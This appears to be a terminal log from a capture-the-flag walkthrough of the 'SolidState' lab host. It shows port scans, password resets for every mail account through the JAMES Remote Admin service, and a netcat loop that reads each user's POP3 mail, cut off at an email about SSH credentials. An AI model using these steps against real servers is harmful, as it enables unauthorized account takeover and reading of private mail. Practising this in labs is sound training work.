➜ ~ sudo masscan -p0-65535 --max-rate 1000 10.10.10.51
[sudo] password for miao:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-03-14 20:35:04 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 25/tcp on 10.10.10.51
Discovered open port 110/tcp on 10.10.10.51
Discovered open port 4555/tcp on 10.10.10.51
Discovered open port 80/tcp on 10.10.10.51
Discovered open port 22/tcp on 10.10.10.51
Discovered open port 119/tcp on 10.10.10.51
$ nmap -sC -sV -p22,25,80,110,119,4555 10.10.10.51
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-16 13:22 CST
Nmap scan report for 10.10.10.51
Host is up (0.067s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.4 [10.10.14.4]),
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.63 seconds
setpassword james abcd
setpassword thomas abcd
setpassword john abcd
setpassword mindy abcd
setpassword mailadmin abcd
quit
for user in james john thomas mindy mailadmin; do ( echo USER ${user}; sleep 2s; echo PASS abcd; sleep 2s; echo LIST; sleep 2s; echo quit) | nc -nvC 10.10.10.51 110; done
$ ncat -nvC 10.10.10.51 110
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 10.10.10.51:110.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS abcd
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
REPR 1
-ERR
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security.

Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login. Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.